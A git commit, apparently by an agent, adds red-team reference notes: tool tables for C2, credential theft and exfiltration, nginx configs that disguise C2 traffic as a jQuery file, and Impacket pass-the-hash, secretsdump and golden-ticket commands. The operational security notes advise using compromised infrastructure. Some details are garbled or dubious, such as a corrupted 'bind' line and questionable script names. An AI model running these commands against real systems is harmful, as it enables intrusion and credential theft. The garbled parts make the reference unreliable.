commit 10a96543ad294b99aed5a5b3230c5626706720c7 Author: Hermes Agent Date: Fri May 8 18:07:45 2026 -0500 Initial commit: GreySec red team tooling reference diff --git a/README.md b/README.md new file mode 100644 index 0000000..1693d7f --- /dev/null +++ b/README.md @@ -0,0 +1,61 @@ +# GreySec Red Team Tools + +Documentation and operational notes for red team tooling used in GreySec engagements. + +## Core C2 Framework + +| Tool | Purpose | Key Modules | +|------|---------|-------------| +| Metasploit | Exploitation, pivoting | meterpreter, shell sessions | +| Covenant | .NET C2 | Grunt, pivot listeners | +| Sliver |golang C2 | beacons, session management | + +## Network Reconnaissance + +| Tool | Purpose | +|------|---------| +| nmap | Port scanning, service detection | +| BloodHound | AD enumeration | +| CrackMapExec | Network pentest automation | + +## Credential Attacks + +| Tool | Purpose | +|------|---------| +| Hashcat | Password cracking | +| John | Credential attacks | +| mimikatz | LSASS, credential extraction | + +## Lateral Movement + +| Tool | Purpose | +|------|---------| +| Impacket | SMB, WMI, DCOM execution | +| Evil-WinRM | WinRM shell access | +| psexec.py | Remote service execution | + +## Persistence + +| Tool | Purpose | +|------|---------| +| CrackMapExec | Admin persistence | +| mimikatz | Credential dumping | +| WCE | Windows credential editor | + +## Exfiltration + +| Tool | Purpose | +|------|---------| +| Cobalt Strike | Data exfiltration | +| DNS-over-HTTPS tunnel | Covert exfil | +| Staged payloads | Encrypted channels | + +## Operational Security + +- All tools must be run through a redirector (nginx/apache) +- Use compromised infrastructure when possible +- OPSEC-check before every action + +## Setup + +See individual tool directories for installation and configuration. \ No newline at end of file diff --git a/c2-redirectors.md b/c2-redirectors.md new file mode 100644 index 0000000..e089c30 --- /dev/null +++ b/c2-redirectors.md @@ -0,0 +1,80 @@ +# C2 Redirectors (nginx) + +## Purpose + +Redirectors proxy C2 traffic through legitimate-looking infrastructure to hide the actual C2 server. + +## Setup (nginx on Debian/Ubuntu) + +```bash +# Install +apt install nginx openssl + +# For HTTPS redirectors, get a cert: +certbot --nginx -d redirector.example.com +``` + +## HTTP Redirector Config + +```nginx +server { + listen 80; + server_name redirector.example.com; + + location / { + return 301 https://legitimate-site.com$request_uri; + } +} + +server { + listen 443 ssl; + server_name redirector.example.com; + + ssl_certificate /etc/letsencrypt/live/redirector.example.com/fullchain.pem; + ssl_certificate_key /etc/letsencrypt/live/redirector.example.com/privkey.pem; + + location /static { + proxy_pass https://legitimate-site.com; + proxy_set_header Host legitimate-site.com; + } + + # C2 traffic goes to actual C2 + location /jquery-3.6.0.min.js { + proxy_pass http://10.0.0.5:8080; + } +} +``` + +## Cobalt Strike Redirector + +```nginx +# For Cobalt Strike C2, route traffic based on URI +location /jquery-3.6.0.min.js { + proxy_pass http://c2-server:80; + proxy_set_header Host staging.hoolulu.com; +} +``` + +## Sliver Redirector + +```nginx +# Sliver uses HTTPS with specific paths +location /api/v2/status { + proxy_pass http://sliver-server:443; +} +``` + +## DNS Redirector (for DNS C2) + +```bash +# Setup DNS with dnsmasq +echo "A record pointing to your C2 IP" >> /etc/dnsmasq.d/c2.conf +systemctl restart dnsmasq +``` + +## Operational Notes + +- Use CDN domains when possible (CloudFlare, Akamai) +- Separate redirectors per operation +- Log everything for attribution if needed +- Test redirects before engagement \ No newline at end of file diff --git a/impacket-reference.md b/impacket-reference.md new file mode 100644 index 0000000..409c5f2 --- /dev/null +++ b/impacket-reference.md @@ -0,0 +1,71 @@ +# Impacket Usage Reference + +## Overview + +Impacket is a collection of Python classes for working with network protocols. Core tool for Windows pentesting. + +## Installation + +```bash +pip install impacket +# Or from source: +git clone https://github.com/fortra/impacket +cd impacket && pip install . +``` + +## Key Scripts + +### Remote Execution + +```bash +# psexec.py - Pass-the-Hash +python3 psexec.py DOMAIN/user@target.lan -hashes lm:ntlm + +# wmiexec.py - Stealth WMI exec +python3 wmiexec.py DOMAIN/user@target.lan -hashes lm:ntlm + +# atexec.py - Scheduled task exec +python3 atexec.py DOMAIN/user@target.lan -hashes lm:ntlm +``` + +### Credential Extraction + +```bash +# secretsdump.py - NTDS.dit extraction +python3 secretsdump.py DOMAIN/user@target.lan -hashes lm:ntlm + +# mimikatz.py - Remote mimikatz +python3 mimikatz.py DOMAIN/user@target.lan -hashes lm:ntlm +``` + +### Kerberos Attacks + +```bash +# getTGT.py - Ticket extraction +python3 getTGT.py DOMAIN/user:password + +# goldenPac.py - Golden ticket + auto-exec +python3 goldenPac.py DOMAIN/user@target.lan +``` + +### Network Discovery + +```bash +# smbclient.py - Anonymous SMB share browsing +python3 smbclient.py DOMAIN/user@target.lan + +# rpcclient.py - RPC bindè”· +python3 rpcclient.py target.lan -N +``` + +## OPSEC Notes + +- wmiExec leaves fewer artifacts than psexec +- Use -dc-ip for Kerberoasting +- secretsdump requires domain admin or NTDS.dit access +- Always check firewall rules before port scanning + +## GreySec Engagement Notes + +Used in: `exploit-pipeline` for lateral movement automation. +See: https://gsfiles.tail57cd.ts.net/greysec/exploit-pipeline \ No newline at end of file